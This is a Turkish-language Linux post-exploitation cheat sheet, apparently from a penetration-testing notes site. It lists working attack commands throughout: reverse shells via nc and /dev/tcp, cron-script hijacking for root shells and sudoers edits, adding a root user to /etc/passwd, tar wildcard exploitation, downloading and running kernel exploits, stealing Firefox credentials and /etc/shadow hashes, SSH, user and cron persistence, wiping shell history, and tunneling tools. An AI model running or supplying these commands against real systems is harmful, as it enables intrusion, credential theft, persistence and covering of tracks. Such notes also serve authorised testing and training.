Linux Post Exploitation

Kullanıcı ve Gruplar

id # Kullanıcı ve grup
cat /etc/passwd # Kullanıcılar
env # Ortam Değişkenleri
cat .bashrc

Sistem Bilgileri

hostname # Hostname
uname -a # Kernel Versiyon
cat /etc/os-release
cat /etc/issue
dpkg -l # Uygulamalar

# Mount edilmiş dizinler
cat /etc/fstab
mount

# Bütün diskler
lsblk

# Modül ve Driverlar
lsmod
/sbin/modinfo libata

grep -Ril "aranacak_kelime" / 2>/dev/null # Kelime Arama
find / -name flag.txt 2>/dev/null # Dosya Arama

Process Bilgileri

ps aux

Ağ Bilgileri

# Ağ Arayüzleri
ip a
ifconfig a

# Açık Portlar
netstat -punta
ss -ntpul

# Yönlendirme Tablosu
route
cat /etc/networks
ip route

# Firewall Ayarları
cat /etc/iptables/rules.v4

# Localde Gelen Parolalar
sudo tcpdump -i lo -A | grep "pass"

cat /etc/hosts # Hosts dosyası
cat /etc/resolv.conf # DNS dosyası

CronJobs

ls -lah /etc/cron* # Cronjob Listesi
cat /var/spool/cron/crontabs/root # Root Crontab
crontab -l # Kullanıcının Cronjob Listesi
sudo crontab -l # Root Cronjob Listesi
grep "CRON" /var/log/syslog # Sistem Loglarında Cronjob Arama

# Bütün Cronjoblar
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"

# Reverse Shell Exploit
ls -la /home/john/backup.sh
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.1.3 1234 >/tmp/f" > /home/john/backup.sh

# Root Shell Exploit
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/john/backup.sh
/tmp/bash -ip

# Sudo Yetkisi ile Exploit
printf '#! /bin/bash\necho "john ALL=NOPASSWD:ALL" >> /etc/sudoers' > /home/john/backup.sh

World Writable Dosyalar

find / -type f -not -path "/proc/*" -not -path "/sys/*" -not -path "$HOME/*" -writable 2>/dev/null

# Eğer /etc/passwd var ise root kullanıcı ekleyebiliriz
openssl passwd password
echo "root2:xxxxxxxxxxxxxxx:0:0:root:/root:/bin/bash" >> /etc/passwd
su root2

SUID Binary

find / -perm -4000 2>/dev/null

# Aşağıdaki Dosyalar Normal
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/bin/su
/bin/mount
/bin/umount

# Veya SUID ile işaretlenmiş bir dosya bizim değiştirebildiğimiz bir dosyayı kullanıyorsa
ls -la backup.sh # SUID Olan Dosya
ls -la backup.config # SUID Olan Dosyanın Çağırdığı Dosya

cp /bin/bash > backup.config
./backup.sh

SUDO

Bu komutlar ile hangi dosyaları sudo komutu ile çalıştırabileceğimizi görebiliriz.

sudo -l

# NOPASSWD:ALL ROOT olan bir sh dosyası varsa shell alabiliriz
sudo /usr/bin/backup.sh -c /bin/bash

Binary Capabilities

GTFOBins: https://gtfobins.github.io/

/usr/sbin/getcap -r / 2>/dev/null

Wildcard Exploit

Eğer bir cronjob'da * karakteri varsa aşağıdaki exploit uygulanabilir.

echo > "--checkpoint=1"
echo > "--checkpoint-action=exec=sh shell.sh"
grep "echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > shell.sh
chmod 777 shell.sh
/tmp/bash -ip

Automated

# Local
cp /usr/bin/unix-privesc-check .
cp /usr/share/peass/linpeas .
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
python -m http.server 80

# Target
cd /tmp
wget http://192.168.1.3/LinEnum.sh
wget http://192.168.1.3/linpeas
wget http://192.168.1.3/unix-privesc-check

chmod +x LinEnum.sh
chmod +x linpeas
chmod +x unix-privesc-check

./LinEnum.sh
./linpeas
./unix-privesc-check standard > output.txt

Reverse Shell

# Basit Listener
nc -lvnp 9001 
# Otomatik Listener
pwncat-cs -p 9001


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.1.2 9001 >/tmp/f
/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.1.2/9001 0>&1'
echo "<BASE64_REV>"|base64${IFS}-d|bash

Shell Upgrade

# Python varsa
python3 -c 'import pty; pty.spawn("/bin/bash")'
python2 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'

# Python yoksa
script /dev/null -qc /bin/bash

# Sonrasında
CTRL + Z

stty size # Buradaki değeri altta giriyoruz
stty raw -echo; fg; ls;
export SHELL=/bin/bash; export TERM=xterm;
stty rows 181 columns 42; reset;

Firefox Creds

Decrypter: https://github.com/unode/firefox_decrypt

cat /root/.mozilla/firefox/x.default-esr/logins.json
cat /root/.mozilla/firefox/x.default-esr/cookies.sqlite
cat /root/.mozilla/firefox/x.default-esr/formhistory.sqlite
cat /root/.mozilla/firefox/x.default-esr/key4.db
cat /root/.mozilla/firefox/x.default-esr/logins.json

Dosya Transferi

# Local
python3 -m http.server 80
updog 80

# Hedef
cd /tmp
wget http://192.168.1.3/LinEnum.sh

# Netcat ile
nc -lvnp 1234 > file.txt
nc -w 3 192.168.1.3 1234 < file.txt

Kernel Exploit

cat /etc/issue
uname -r

searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation"   | grep  "4." | grep -v " < 4.4.0" | grep -v "4.8"
python -m http.server 80

wget http://192.168.1.3/cve-2017-16995.c
gcc cve-2017-16995.c -o cve-2017-16995
./cve-2017-16995

SSH Persistence

# Eğer id_rsa yoksa
ssh-keygen

scp root@192.168.1.3:~/.ssh/id_rsa .
chmod 600 id_rsa
ssh root@192.168.1.3 -i id_rsa

ssh-keygen # Kali de ssh key olustur
cat /root/.ssh/id_rsa.pub

echo 'xxxxxxxxxxxxxx'>/root/.ssh/authorized_keys
chmod 700 /root/.ssh
chmod 600 /root/.ssh/authorized_keys

User Persistence

useradd  -m -s /bin/bash hacker
usermod -aG sudo hacker
passwd hacker

ssh hacker@192.168.1.3

Cron Persistence

echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<IP>/1234 0>&1'" > cron
crontab -i cron
crontab -l

Hash Dumping

Eğer hedef makinede root kullanıcı isek aşağıdaki komut ile bütün kullanıcıların hash değerlerini görebiliriz.

cat /etc/shadow


john --format=sha512crypt hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
hashcat -a3 -m 1800 hashes.txt /usr/share/wordlists/rockyou.txt

ssh2john id_rsa > ssh.hash
sudo sh -c 'cat /home/kali/passwordattacks/ssh.rule >> /etc/john/john.conf'

History Silme

history -c
cat /dev/null > ~/.bash_history

Port Forwarding

# Aynı ağdaki 22 portu açık olan servisi kendi portuna yönlendirir
socat -ddd TCP-LISTEN:2222,fork TCP:192.168.1.4:22

ssh 192.168.1.3 -p 2222

SSH Tunneling

# Local port forwarding
ssh -N -L 0.0.0.0:2222:172.16.1.4:22 root@192.168.1.3
ssh root@192.168.1.3 -p 2222

# Dynamic Port Forwarding
ssh -N -D 0.0.0.0:9999 root@192.168.1.3

mousepad /etc/proxychains4.conf
socks5 192.168.1.3 9999

proxychains nmap -v -sT -Pn 172.168.1.3

# Remote Port Forward
systemctl start ssh
ssh -N -R 127.0.0.1:2222:10.4.50.215:22 root@192.168.1.2
ssh 127.0.0.1 -p 2222

# Remote Dynamic Port Forward
ssh -N -R 9999 root@192.168.1.2

mousepad /etc/proxychains4.conf
socks5 127.0.0.1 9999

proxychains nmap -v -sT -Pn -n 172.168.1.3

# SShuttle
sshuttle -r root@192.168.1.3:22 10.0.0.0/24 172.16.0.0/24

HTTP Tunneling

# https://github.com/jpillora/chisel/releases
python -m http.server 80
chisel server --port 8081 --reverse

wget http://192.168.1.2/chisel -O /tmp/chisel && chmod +x /tmp/chisel
/tmp/chisel client 192.168.1.3:8081 R:socks &> /tmp/output
mousepad /etc/proxychains4.conf
#socks5 127.0.0.1 1080


# Ligolo
./proxy -selfcert -laddr 0.0.0.0:443
./agent -ignore-cert -connect 192.168.1.2:443

DNS Tunneling

mousepad dnsmasq.conf
# Do not read /etc/resolv.conf or /etc/hosts
no-resolv
no-hosts

# Define the zone
auth-zone=feline.corp
auth-server=feline.corp

# TXT record
txt-record=www.feline.corp,here's something useful!
txt-record=www.feline.corp,here's something else less useful.


dnsmasq -C dnsmasq.conf -d


# Local
dnscat2-server feline.corp
cp /usr/bin/dnscat .
python -m http.server 80

# Hedef
wget http://192.168.1.2/dnscat -O /tmp/dnscat && chmod +x /tmp/dnscat
/tmp/dnscat feline.corp

window -i 1
listen 0.0.0.0:4455 172.16.2.4:445

PreviousAV Evasion NextActive Directory Services

Last updated 11 days ago